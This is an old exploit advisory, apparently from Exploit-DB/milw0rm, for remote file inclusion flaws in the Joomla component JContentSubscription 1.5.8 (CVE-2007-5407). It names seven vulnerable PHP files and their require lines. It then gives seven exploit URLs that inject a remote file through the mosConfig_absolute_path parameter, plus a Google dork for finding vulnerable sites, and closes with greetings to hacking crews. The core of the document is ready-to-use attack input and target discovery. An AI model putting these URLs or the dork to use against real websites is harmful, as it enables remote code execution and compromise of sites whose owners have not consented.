Joomla Component JContentSubscription 1.5.8 - Multiple RFI Vulns

2007-10-10T00:00:00
ID EDB-ID:4508
Type exploitdb
Reporter NoGe
Modified 2007-10-10T00:00:00

Description

Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns. CVE-2007-5407. Webapps exploit for php platform

                                        
                                            # JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

   Component    : com_jcs version 1.5.8 - payable component
   Dicovered by : NoGe
   Contact      : pace.noge@hotmail.com

==================================================================================================================================

# Vulnerable file

   /administrator/components/com_jcs/jcs.function.php

   line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/add.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/history.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/register.php

   line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/views/list.sub.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/list.user.sub.html.php

   line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/reports.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

# Exploit

   http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

# Google dork

   inurl:com_jcs

==================================================================================================================================

# Greetz

   all crew #papuahacker #baliemhackerlink #nyubicrew
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
   http://kapukvalley.net member

================================================================================================================================== 

# milw0rm.com [2007-10-10]